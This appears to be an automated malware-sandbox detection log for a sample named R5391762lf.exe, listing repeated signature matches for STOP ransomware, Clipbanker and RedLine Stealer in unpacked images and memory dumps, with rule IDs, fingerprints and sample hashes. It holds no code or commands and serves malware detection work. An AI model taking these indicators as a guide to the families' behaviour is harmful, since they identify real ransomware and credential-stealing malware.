Source: 23.2.R5391762lf.exe.5e115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.R5391762lf.exe.5e115a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.R5391762lf.exe.5da15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.2.R5391762lf.exe.5ec15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.2.R5391762lf.exe.5db15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.2.R5391762lf.exe.5da15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 24.2.R5391762lf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0.2.R5391762lf.exe.5ea15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 2.2.R5391762lf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001E.00000002.2677102464.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.1561850226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000002.3833609200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000014.00000002.3833462867.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000005.00000002.1405143882.0000000004456000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000002.1620821652.000000000088C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.1548831250.0000000005DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000018.00000002.1801978048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000000.00000002.1373934785.0000000004498000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.1502845330.0000000001D0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.1548118097.0000000004466000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000002.1411013560.0000000004578000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001B.00000002.2060772952.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.1792622413.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000017.00000002.1792336779.00000000044D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2059366101.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001F.00000002.2676356915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000000D.00000002.1620588181.0000000000850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.1703479175.0000000000B3C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000020.00000002.3283516956.0000000000AC0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000021.00000002.3281999346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
